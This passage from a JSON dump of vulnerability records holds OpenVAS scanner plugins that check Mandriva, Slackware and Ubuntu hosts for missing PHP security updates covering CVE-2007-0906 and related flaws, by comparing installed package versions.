rpm:\"php-cgi~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2006.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.0.4~2.5.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.0.4~1.1.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.0.4~1.1.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:12", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830326", "id": "OPENVAS:830326", "title": "Mandriva Update for php MDKSA-2007:048 (php)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDKSA-2007:048 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities were discovered in PHP language.\n\n Many buffer overflow flaws were discovered in the PHP session\n extension, the str_replace() function, and the imap_mail_compose()\n function. An attacker able to use a PHP application using any of\n these functions could trigger these flaws and possibly execute\n arbitrary code as the apache user (CVE-2007-0906).\n \n A one-byte memory read will always occur prior to the beginning of a\n buffer, which could be triggered, for example, by any use of the\n header() function in a script (CVE-2007-0907).\n \n The wddx extension, if used to import WDDX data from an untrusted\n source, may allow a random portion of heap memory to be exposed due\n to certain WDDX input packets (CVE-2007-0908).\n \n The odbc_result_all() function, if used to display data from a\n database,\n and if the contents of the database are under the control of an\n attacker, could lead to the execution of arbitrary code due to a format\n string vulnerability (CVE-2007-0909).\n \n Several flaws in the PHP could allow attackers to clobber certain\n super-global variables via unspecified vectors (CVE-2007-0910).\n \n The zend_hash_init() function can be forced into an infinite loop\n if unserializing untrusted data on a 64-bit platform, resulting in\n the consumption of CPU resources until the script timeout alarm aborts\n the execution of the script (CVE-2007-0988).\n \n Updated package have been patched to correct this issue.\";\n\ntag_affected = \"php on Mandriva Linux 2006.0,\n Mandriva Linux 2006.0/X86_64,\n Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-02/msg00019.php\");\n script_id(830326);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDKSA\", value: \"2007:048\");\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\");\n script_name( \"Mandriva Update for php MDKSA-2007:048 (php)\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2006.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.0.4~2.5.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.0.4~1.1.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.0.4~1.1.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.0.4~9.19.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:06", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2007-053-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231058066", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231058066", "title": "Slackware Advisory SSA:2007-053-01 php", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2007_053_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.58066\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2007-053-01 php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(10\\.2|11\\.0)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2007-053-01\");\n\n script_tag(name:\"insight\", value:\"New php packages are available for Slackware 10.2 and 11.0 to improve the\nstability and security of PHP. Quite a few bugs were fixed. All sites that use PHP are\nencouraged to upgrade. Please note that we haven't tested all PHP\napplications for backwards compatibility with this new upgrade, so you\nshould have the old package on hand just in case.\n\nBoth PHP 4.4.5 and PHP 5.2.1 updates have been provided.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2007-053-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"5.2.1-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"5.2.1-i486-1_slack11.0\", rls:\"SLK11.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:29:36", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-424-2", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840188", "id": "OPENVAS:840188", "title": "Ubuntu Update for php5 regression USN-424-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_424_2.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for php5 regression USN-424-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-424-1 fixed vulnerabilities in PHP. However, some upstream changes\n were not included, which caused errors in the stream filters. This\n update fixes the problem.\n\n We apologize for the inconvenience.\n \n Original advisory details:\n \n Multiple buffer overflows have been discovered in various PHP modules.\n If a PHP application processes untrusted data with functions of the\n session or zip module, or various string functions, a remote attacker\n could exploit this to execute arbitrary code with the privileges of\n the web server. (CVE-2007-0906)\n \n The sapi_header_op() function had a buffer underflow that could be\n exploited to crash the PHP interpreter. (CVE-2007-0907)\n \n The wddx unserialization handler did not correctly check for some\n buffer boundaries and had an uninitialized variable. By unserializing\n untrusted data, this could be exploited to expose memory regions that\n were not meant to be accessible. Depending on the PHP application this\n could lead to disclosure of potentially sensitive information.\n (CVE-2007-0908)\n \n On 64 bit systems (the amd64 and sparc platforms), various print\n functions and the odbc_result_all() were susceptible to a format\n string vulnerability. A remote attacker could exploit this to execute\n arbitrary code with the privileges of the web server. (CVE-2007-0909)\n \n Under certain circumstances it was possible to overwrite superglobal\n variables (like the HTTP GET/POST arrays) with crafted session data.\n (CVE-2007-0910)\n \n When unserializing untrusted data on 64-bit platforms the\n zend_hash_init() function could be forced to enter an infinite loop,\n consuming CPU resources, for a limited length of time, until the\n script timeout alarm aborts the script. (CVE-2007-0988)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-424-2\";\ntag_affected = \"php5 regression on Ubuntu 5.10 ,\n Ubuntu 6.06 LTS ,\n Ubuntu 6.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-424-2/\");\n script_id(840188);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:55:18 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"424-2\");\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\");\n script_name( \"Ubuntu Update for php5 regression USN-424-2\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysqli\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.1.2-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysqli\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.1.6-1ubuntu2.3\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU5.10\")\n{\n\n if ((res = 